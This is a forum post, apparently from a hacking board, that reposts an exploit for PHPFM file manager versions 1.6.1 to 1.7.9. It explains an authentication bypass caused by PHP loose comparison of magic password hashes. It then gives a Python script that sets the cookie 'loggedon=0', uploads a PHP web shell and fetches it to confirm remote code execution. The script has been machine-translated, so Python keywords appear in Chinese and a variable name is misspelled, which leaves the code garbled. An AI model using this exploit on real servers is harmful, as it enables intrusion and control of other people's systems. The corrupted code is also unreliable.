H

PHPFM v1.7.9-身份验证类型

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题: PHPFM v1.7.9-身份验证类型
#日期: 2023-07-10
#利用作者: ThinkyFault
#供应商homepage: https://www.dulldusk.com/phpfm/
#软件link: https://github.com/dulldusk/phpfm/
#版本: 1.6.1-1.7.9
#测试在: Ubuntu 22.04
#CVE : N/A
'''
当用户意外选择的密码hash以0E,00e和某些PHP版本为0 x时,存在身份验证旁路。这是因为在密码哈希和loggedon值之间进行了宽松的类型比较,默认情况下,该值的未经验证用户为0,并且可以由攻击者控制。这使攻击者可以绕过登录并获得远程代码执行。
可以在此处找到脆弱密码哈希的列表。
'''
导入请求
导入系统
如果Len(sys.argv)2:
print(f'[*] Syntax:/{file} http://target/')
sys.exit(0)
url=sys.argv [1] .rstrip('/') +'/index.php'
payload_name='shell.php'
有效载荷='?php Echo'我是壳牌';
payload_url=url.replace('index.php',payload_name)
标题={'accept-Language':'En-us,en; q=0.5','cookie':'loggedon=0'}
files={'dir_dest':(无,'/srv/http/'),'action':(none,'10'),'upfiles []':('shell.php',pordeload)}
requests.post(url,标头=标题,文件=文件)
r=requests.get(payload_url)
如果r.status_code==200:
打印(f'[*]利用成功: {payload_url}')
印刷(R.Text)
其他:
打印(f'[*]利用可能失败,有效载荷URL返回了:的非2000状态代码{r.status_code}')
 
后退
顶部